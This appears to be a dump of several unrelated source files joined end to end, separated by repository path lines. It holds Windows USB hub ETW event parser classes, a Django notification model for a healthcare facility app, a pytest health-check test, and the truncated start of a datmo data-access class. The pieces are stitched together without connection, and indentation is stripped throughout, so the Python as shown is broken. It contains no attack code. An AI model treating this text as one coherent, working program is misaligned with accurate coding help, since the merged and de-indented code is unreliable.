@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=31, version=0)
class Microsoft_Windows_USB_USBHUB_31_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=32, version=0)
class Microsoft_Windows_USB_USBHUB_32_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=33, version=0)
class Microsoft_Windows_USB_USBHUB_33_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=34, version=0)
class Microsoft_Windows_USB_USBHUB_34_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=35, version=0)
class Microsoft_Windows_USB_USBHUB_35_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=36, version=0)
class Microsoft_Windows_USB_USBHUB_36_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=37, version=0)
class Microsoft_Windows_USB_USBHUB_37_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=39, version=0)
class Microsoft_Windows_USB_USBHUB_39_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=40, version=0)
class Microsoft_Windows_USB_USBHUB_40_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=41, version=0)
class Microsoft_Windows_USB_USBHUB_41_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=49, version=0)
class Microsoft_Windows_USB_USBHUB_49_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=50, version=0)
class Microsoft_Windows_USB_USBHUB_50_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=51, version=0)
class Microsoft_Windows_USB_USBHUB_51_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=59, version=0)
class Microsoft_Windows_USB_USBHUB_59_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=60, version=0)
class Microsoft_Windows_USB_USBHUB_60_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=61, version=0)
class Microsoft_Windows_USB_USBHUB_61_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=62, version=0)
class Microsoft_Windows_USB_USBHUB_62_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=63, version=0)
class Microsoft_Windows_USB_USBHUB_63_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=64, version=0)
class Microsoft_Windows_USB_USBHUB_64_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=70, version=0)
class Microsoft_Windows_USB_USBHUB_70_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=71, version=0)
class Microsoft_Windows_USB_USBHUB_71_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=80, version=0)
class Microsoft_Windows_USB_USBHUB_80_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_PortAttributes" / Int16ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=81, version=0)
class Microsoft_Windows_USB_USBHUB_81_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=82, version=0)
class Microsoft_Windows_USB_USBHUB_82_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=83, version=0)
class Microsoft_Windows_USB_USBHUB_83_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=84, version=0)
class Microsoft_Windows_USB_USBHUB_84_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=100, version=0)
class Microsoft_Windows_USB_USBHUB_100_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_USBHUB_Device_State" / Guid,
"fid_DeviceDescriptor" / Int64ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=101, version=0)
class Microsoft_Windows_USB_USBHUB_101_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / CString,
"fid_USBHUB_Device" / Int32sl
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=102, version=0)
class Microsoft_Windows_USB_USBHUB_102_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_USBHUB_Device_State" / Guid,
"fid_DeviceDescriptor" / Int64ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=103, version=0)
class Microsoft_Windows_USB_USBHUB_103_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_DeviceDescription" / WString
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=110, version=0)
class Microsoft_Windows_USB_USBHUB_110_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=111, version=0)
class Microsoft_Windows_USB_USBHUB_111_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=112, version=0)
class Microsoft_Windows_USB_USBHUB_112_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=113, version=0)
class Microsoft_Windows_USB_USBHUB_113_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=114, version=0)
class Microsoft_Windows_USB_USBHUB_114_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_DeviceDescription" / WString
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=119, version=0)
class Microsoft_Windows_USB_USBHUB_119_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=120, version=0)
class Microsoft_Windows_USB_USBHUB_120_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=121, version=0)
class Microsoft_Windows_USB_USBHUB_121_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=122, version=0)
class Microsoft_Windows_USB_USBHUB_122_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=123, version=0)
class Microsoft_Windows_USB_USBHUB_123_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Device" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=130, version=0)
class Microsoft_Windows_USB_USBHUB_130_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=139, version=0)
class Microsoft_Windows_USB_USBHUB_139_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=140, version=0)
class Microsoft_Windows_USB_USBHUB_140_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=149, version=0)
class Microsoft_Windows_USB_USBHUB_149_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=150, version=0)
class Microsoft_Windows_USB_USBHUB_150_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=151, version=0)
class Microsoft_Windows_USB_USBHUB_151_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=159, version=0)
class Microsoft_Windows_USB_USBHUB_159_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=160, version=0)
class Microsoft_Windows_USB_USBHUB_160_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=161, version=0)
class Microsoft_Windows_USB_USBHUB_161_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=169, version=0)
class Microsoft_Windows_USB_USBHUB_169_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=170, version=0)
class Microsoft_Windows_USB_USBHUB_170_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=171, version=0)
class Microsoft_Windows_USB_USBHUB_171_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=172, version=0)
class Microsoft_Windows_USB_USBHUB_172_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=173, version=0)
class Microsoft_Windows_USB_USBHUB_173_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=174, version=0)
class Microsoft_Windows_USB_USBHUB_174_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=175, version=0)
class Microsoft_Windows_USB_USBHUB_175_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=176, version=0)
class Microsoft_Windows_USB_USBHUB_176_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=177, version=0)
class Microsoft_Windows_USB_USBHUB_177_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=178, version=0)
class Microsoft_Windows_USB_USBHUB_178_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=179, version=0)
class Microsoft_Windows_USB_USBHUB_179_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=180, version=0)
class Microsoft_Windows_USB_USBHUB_180_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=181, version=0)
class Microsoft_Windows_USB_USBHUB_181_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=183, version=0)
class Microsoft_Windows_USB_USBHUB_183_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=184, version=0)
class Microsoft_Windows_USB_USBHUB_184_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=185, version=0)
class Microsoft_Windows_USB_USBHUB_185_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=189, version=0)
class Microsoft_Windows_USB_USBHUB_189_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=190, version=0)
class Microsoft_Windows_USB_USBHUB_190_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=199, version=0)
class Microsoft_Windows_USB_USBHUB_199_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=200, version=0)
class Microsoft_Windows_USB_USBHUB_200_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=209, version=0)
class Microsoft_Windows_USB_USBHUB_209_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PowerState" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=210, version=0)
class Microsoft_Windows_USB_USBHUB_210_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int32sl,
"fid_USBHUB_Hub" / Double,
"fid_PortNumber" / Int32ul,
"fid_Class" / Int32ul,
"fid_NtStatus" / Int32ul,
"fid_UsbdStatus" / Int32ul,
"fid_DebugText" / CString
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=211, version=0)
class Microsoft_Windows_USB_USBHUB_211_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_PortStatusChange" / Int16ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=212, version=0)
class Microsoft_Windows_USB_USBHUB_212_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_TimerTag" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=213, version=0)
class Microsoft_Windows_USB_USBHUB_213_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_TimerTag" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=214, version=0)
class Microsoft_Windows_USB_USBHUB_214_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_TimerTag" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=220, version=0)
class Microsoft_Windows_USB_USBHUB_220_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=229, version=0)
class Microsoft_Windows_USB_USBHUB_229_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=230, version=0)
class Microsoft_Windows_USB_USBHUB_230_0(Etw):
pattern = Struct(
"fid_TimeElapsedBeforeLogStart" / Int64ul,
"fid_USBHUB_HC" / Int32ul,
"fid_USBHUB_Hub" / Int8ul,
"fid_PortNumber" / Int32ul,
"fid_Class" / Int32ul,
"fid_NtStatus" / Int32ul,
"fid_UsbdStatus" / Int32ul,
"fid_DebugText" / CString
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=231, version=0)
class Microsoft_Windows_USB_USBHUB_231_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=232, version=0)
class Microsoft_Windows_USB_USBHUB_232_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8sl,
"fid_USBHUB_Device" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=233, version=0)
class Microsoft_Windows_USB_USBHUB_233_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
@declare(guid=guid("7426a56b-e2d5-4b30-bdef-b31815c1a74a"), event_id=234, version=0)
class Microsoft_Windows_USB_USBHUB_234_0(Etw):
pattern = Struct(
"fid_USBHUB_HC" / Int8ul,
"fid_USBHUB_Hub" / Int64sl,
"fid_PortNumber" / Int32ul,
"fid_Status" / Int32ul
)
|
care/facility/models/notification.py | gigincg/care | 189 | 32898 | import enum
from django.db import models
from care.facility.models import FacilityBaseModel
from care.users.models import User
from django.contrib.postgres.fields import JSONField
class Notification(FacilityBaseModel):
class EventType(enum.Enum):
SYSTEM_GENERATED = 50
CUSTOM_MESSAGE = 100
EventTypeChoices = [(e.value, e.name) for e in EventType]
class Medium(enum.Enum):
SYSTEM = 0
SMS = 100
WHATSAPP = 200
MediumChoices = [(e.value, e.name) for e in Medium]
class Event(enum.Enum):
MESSAGE = 0
PATIENT_CREATED = 20
PATIENT_UPDATED = 30
PATIENT_DELETED = 40
PATIENT_CONSULTATION_CREATED = 50
PATIENT_CONSULTATION_UPDATED = 60
PATIENT_CONSULTATION_DELETED = 70
INVESTIGATION_SESSION_CREATED = 80
INVESTIGATION_UPDATED = 90
PATIENT_FILE_UPLOAD_CREATED = 100
CONSULTATION_FILE_UPLOAD_CREATED = 110
PATIENT_CONSULTATION_UPDATE_CREATED = 120
PATIENT_CONSULTATION_UPDATE_UPDATED = 130
PATIENT_CONSULTATION_ASSIGNMENT = 140
SHIFTING_UPDATED = 200
EventChoices = [(e.value, e.name) for e in Event]
intended_for = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True, related_name="notification_intended_for",
)
medium_sent = models.IntegerField(choices=MediumChoices, default=Medium.SYSTEM.value)
caused_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, related_name="notification_caused_by",)
read_at = models.DateTimeField(null=True, blank=True)
event_type = models.IntegerField(choices=EventTypeChoices, default=EventType.SYSTEM_GENERATED.value)
event = models.IntegerField(choices=EventChoices, default=Event.MESSAGE.value)
message = models.TextField(max_length=2000, null=True, default=None)
caused_objects = JSONField(null=True, blank=True, default=dict)
|
web/api/tests/test_health_check.py | marcelomansur/maria-quiteria | 151 | 32919 | <reponame>marcelomansur/maria-quiteria
import pytest
from django.urls import reverse
class TestHealthCheck:
def test_return_success_when_accessing_health_check(self, api_client, url):
response = api_client.get(url, format="json")
assert response.status_code == 200
assert list(response.json().keys()) == ["status", "time"]
assert response.json().get("status") == "available"
def test_return_forbidden_when_trying_to_anonymously_access_a_restricted_route(
self, api_client
):
url = reverse("gazettes-list")
response = api_client.get(url)
assert response.status_code == 403
@pytest.mark.django_db
def test_return_success_when_accessing_a_restricted_route_with_credentials(
self, api_client_authenticated
):
url = reverse("gazettes-list")
response = api_client_authenticated.get(url)
assert response.status_code == 200
|
datmo/core/storage/local/dal.py | awesome-archive/datmo | 331 | 32941 | <filename>datmo/core/storage/local/dal.py
import os
from kids.cache import cache
from datetime import datetime
from datmo.core.util.i18n import get as __
from datmo.core.entity.model import Model
from datmo.core.entity.code import Code
from datmo.core.entity.environment import Environment
from datmo.core.entity.file_collection import FileCollection
from datmo.core.entity.task import Task
from datmo.core.entity.snapshot import Snapshot
from datmo.core.entity.user import User
from datmo.core.util.exceptions import InputError, EntityNotFound, MoreThanOneEntityFound, DALNotInitialized
from datmo.core.util.misc_functions import create_unique_hash
from datmo.core.storage.driver.blitzdb_dal_driver import BlitzDBDALDriver
class LocalDAL():
"""
    LocalDAL is the local data access layer (DAL): it serves as the on-disk storage backend for
    all entities.
Parameters
----------
driver_type : str
type of driver to pull from
driver_options : dict
options for the DALdriver class
driver : datmo.core.storage.driver.DALDriver, optional
